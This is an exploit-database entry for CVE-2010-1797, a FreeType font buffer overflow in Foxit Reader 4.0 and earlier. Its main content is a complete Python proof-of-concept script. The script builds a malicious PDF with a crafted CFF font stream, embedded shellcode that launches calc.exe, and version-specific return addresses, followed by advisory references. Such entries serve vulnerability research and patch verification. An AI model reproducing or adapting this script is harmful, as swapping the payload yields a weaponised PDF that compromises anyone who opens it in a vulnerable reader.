Foxit Reader <= 4.0 pdf Jailbreak

2010.08.26
Credit: Jose Miguel Esparza
Risk: High
Local: No
Remote: Yes
CVE: CVE-2010-1797
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

import sys,zlib def getFFShellcode(sc): ff_sc = '' if len(sc)%4 != 0: sc += (4-len(sc)%4)*'\x00' for i in range(0,len(sc),4): ff_sc += '\xff'+sc[i+3]+sc[i+2]+sc[i+1]+sc[i] return ff_sc outputHeader = ''' ############################################################################################## # FreeType Compact Font Format (CFF) Multiple Stack Based Buffer Overflow (CVE-2010-1797) # ############################################################################################## # # # Product: Foxit Reader <= 4.0 # # Platforms: Windows XP, Windows Vista # # Author: Jose Miguel Esparza <jesparza AT eternal-todo DOT com> # # Web: http://eternal-todo.com # # Date: 2010-08-23 # # # ############################################################################################## ''' outputFileName = 'foxit_type2_poc.pdf' usage = 'Usage: '+sys.argv[0]+' target\n\nTargets:\n\t0 - Foxit Reader > 3.0\n\t1 - Foxit Reader 3.0\n\t2 - Other versions' COMEX_PDF_TEMPLATE = '''%PDF-1.3 %\xbe\xbe\xba\xba 4 0 obj << /Length 631 >> stream q Q q 18 750 576 24 re W n /Cs1 cs 0 0 0 sc q 1 0 0 -1 0 0 cm BT 0.0003 Tc 7 0 0 -7 534.7051 -768 Tm /F2.0 1 Tf [ (4/15/10 8:01 P) 1 (M) ] TJ ET Q q 1 0 0 -1 0 0 cm BT 7 0 0 -7 18 -768 Tm /F2.0 1 Tf [ (d) -0.4 (a) -0.2 (ta) -0.2 (:) -0.4 (te) -0.1 (x) -0.3 (t/) -0.4 (h) 0.4 (tm) 0.4 (l) -0.1 (,) -0.4 ( ) ] TJ ET Q Q q 18 40 576 24 re W n /Cs1 cs 0 0 0 sc q 1 0 0 -1 0 0 cm BT -0.0003 Tc 7 0 0 -7 555.6299 -43 Tm /F2.0 1 Tf [ (Pa) -1 (ge ) -1 (1) -1 ( ) -1 (o) -1 (f ) -1 (1) ] TJ ET Q Q q 18 190 576 560 re W n /Cs1 cs 1 1 1 sc 18 190 576 560 re f 0 0 0 sc q 0.8 0 0 -0.8 18 750 cm BT 16 0 0 -16 8 22 Tm /F2.0 1 Tf ( ) Tj ET Q Q endstream endobj 2 0 obj << /Type /Page /Parent 3 0 R /Resources 5 0 R /Contents 4 0 R /MediaBox [0 0 612 792] >> endobj 5 0 obj << /ProcSet [ /PDF /Text ] /ColorSpace << /Cs1 6 0 R >> /Font << /F2.0 8 0 R >> >> endobj 3 0 obj << /Type /Pages /MediaBox [0 0 612 792] /Count 1 /Kids [ 2 0 R ] >> endobj 7 0 obj << /Type /Catalog /Pages 3 0 R >> endobj 11 0 obj << /Subtype/Type1C /Filter[/FlateDecode] /Length $CFF_STREAM_LENGTH >> stream $CFF_STREAM endstream endobj 9 0 obj << /Type /FontDescriptor /Ascent 750 /CapHeight 676 /Descent -250 /Flags 32 /FontBBox [-203 -428 1700 1272] /FontName /CSDIZD+Times-Roman /ItalicAngle 0 /StemV 0 /MaxWidth 1721 /XHeight 461 /FontFile3 11 0 R >> endobj 10 0 obj [ 556 ] endobj 8 0 obj << /Type /Font /Subtype /Type1 /BaseFont /CSDIZD+Times-Roman /FontDescriptor 9 0 R /Widths 10 0 R /FirstChar 32 /LastChar 32 /Encoding /MacRomanEncoding >> endobj 1 0 obj << >> endobj xref 0 12 0000000000 65535 f 0000017767 00000 n 0000000408 00000 n 0000003397 00000 n 0000000022 00000 n 0000000389 00000 n 0000000512 00000 n 0000003361 00000 n 0000017359 00000 n 0000007240 00000 n 0000000622 00000 n 0000003340 00000 n trailer << /Size 12 /Root 7 0 R /Info 1 0 R >> startxref 17942 %%EOF ''' MAX_FF_SECTION_LEN = 45*5 JUMP_BYTE = ['\xcd','\xcc'] POP_POP_RET_ADDRESS = ['\x00\x40\x11\x85','\x00\x40\xce\x36'] # Foxit reader addresses, depending on the version NUM_SECOND_INSTRUCTIONS_SET = [183,182] # calc.exe shellcode shellcode = '\x68\x10\xf5\x00\x00\x31\xf6\x64\x8b\x76\x30\x8b\x76\x0c\x8b\x76\x1c\x8b\x6e\x08\x8b\x36\x8b\x5d\x3c\x8b\x5c\x1d\x78\x01\xeb\x8b\x4b\x18\x67\xe3\xec\x8b\x7b\x20\x01\xef\x8b\x7c\x8f\xfc\x01\xef\x31\xc0\x99\x32\x17\x66\xc1\xca\x01\xae\x75\xf7\x58\x66\x3b\xd0\x50\xe0\xe2\x75\xcc\x8b\x53\x24\x01\xea\x0f\xb7\x14\x4a\x8b\x7b\x1c\x01\xef\x03\x2c\x97\x66\x3d\x10\xf5\x75\x0e\x33\xc0\x50\x68\x2e\x65\x78\x65\x68\x63\x61\x6c\x63\x54\xff\xd5\x68\x06\xcb\x00\x00\xeb\x92' cff_header = '\x01\x00\x04\x01\x00\x01\x01\x01\x13ABCDEF+Times-Roman\x00\x01\x01\x01\x1f\xf8\x1b\x00\xf8\x1c\x02\xf8\x1d\x03\xf8\x19\x04\x1co\x00\r\xfb<\xfbn\xfa|\xfa\x16\x05\xe9\x11\x8b\x8b\x12\x00\x03\x01\x01\x08\x13\x18001.007Times RomanTimes\x00\x00\x00\x02\x04\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x04\xdc' if len(sys.argv) > 2 or (len(sys.argv) == 2 and not sys.argv[1].isdigit()) or len(sys.argv) == 1: sys.exit(usage) version = int(sys.argv[1]) if version == 2: sys.exit('Versions < 3.0 are not implemented, try it!! ;)\n') if version > 2: sys.exit(usage) print outputHeader print '[-] Creating PDF file...' # Building the FF section ff_shellcode = getFFShellcode(shellcode) ff_zero_bytes = '\xff\x00\x00\x00\x00' ff_instructions = ff_zero_bytes*11 + ff_shellcode + ((MAX_FF_SECTION_LEN - len(ff_shellcode) - 55 - 5*5)/5) * ff_zero_bytes + '\xff\x90\x90\x8a\xeb' + '\xff'+POP_POP_RET_ADDRESS[version] + ('\xff\x00'+JUMP_BYTE[version]+'\x00\x00')*3 if len(ff_instructions) > MAX_FF_SECTION_LEN: sys.exit('[x] FF section bigger than expected!!') # Operators sections first_instructions_set = '\x0c\x17\x0c\x17\x0c\x04\x0c\x1d' * 20 second_instructions_set = '\x0c\x17\x0c\x1d' * NUM_SECOND_INSTRUCTIONS_SET[version] third_instructions_set = '\x0c\x1d\x0c\x12' * 42 # Building the full CFF content for the fake charstring cff_content = cff_header + '\x0e'*4 + ff_instructions + first_instructions_set + second_instructions_set + third_instructions_set + ff_zero_bytes + '\x0e' # Decoding with FlateDecode encoded_cff_content = zlib.compress(cff_content) # Creating the PDF based on the Comex PDF, slightly modified pdf_content = COMEX_PDF_TEMPLATE pdf_content = pdf_content.replace('$CFF_STREAM_LENGTH',str(len(encoded_cff_content))) pdf_content = pdf_content.replace('$CFF_STREAM',encoded_cff_content) open(outputFileName,'w').write(pdf_content) print '[+] File "'+outputFileName+'" created, test it!!'

References:

https://bugzilla.redhat.com/show_bug.cgi?id=621144
https://bugs.launchpad.net/ubuntu/maverick/+source/freetype/+bug/617019
http://xforce.iss.net/xforce/xfdb/60856
http://www.vupen.com/english/advisories/2010/2106
http://www.vupen.com/english/advisories/2010/2018
http://www.ubuntu.com/usn/USN-972-1
2000
http://www.securityfocus.com/bid/42151
http://www.f-secure.com/weblog/archives/00002002.html
http://www.exploit-db.com/exploits/14538
http://support.apple.com/kb/HT4292
http://support.apple.com/kb/HT4291
http://sourceforge.net/projects/freetype/files/freetype2/2.4.2/NEWS/view
http://secunia.com/advisories/40982
http://secunia.com/advisories/40816
http://secunia.com/advisories/40807
http://osvdb.org/66828
http://lists.apple.com/archives/security-announce/2010//Aug/msg00001.html
http://lists.apple.com/archives/security-announce/2010//Aug/msg00000.html
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=11d65e8a1f1f14e56148fd991965424d9bd1cdbc
http://git.savannah.gnu.org/cgit/freetype/freetype2.git/commit/?id=018f5c27813dd7eef4648fe254632ecea0c85a50
http://freetype.sourceforge.net/index2.html#release-freetype-2.4.2


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top